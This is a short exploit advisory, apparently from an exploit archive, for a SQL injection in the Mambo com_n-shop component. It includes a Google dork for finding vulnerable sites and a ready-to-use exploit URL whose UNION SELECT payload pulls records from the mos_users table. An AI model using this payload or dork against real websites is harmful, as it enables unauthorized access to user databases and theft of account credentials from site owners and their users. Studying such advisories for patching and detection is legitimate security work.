------------------------------------------------------------------------------------------------------ # Exploit Title: Mambo Component com_n-shop SQL Injection Vulnerability # Google Dork: inurl:index.php?option=com_n-shop # Date: 01/09/2011 # Author: CoBRa_21 (Penetration Tester) # E-Mail: ghost1lover@hotmail.com # Software Link: http://www.netvistun.is/ # Tested on: FreeBSD 6.1 (remote host) ------------------------------------------------------------------------------------------------------ Exploit http://localhost/[PATH]/index.php?option=com_n-shop&do=add&id[]=370 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from mos_users ------------------------------------------------------------------------------------------------------ Thanks E-Banka.Org & Cyber-Warrior.Org ------------------------------------------------------------------------------------------------------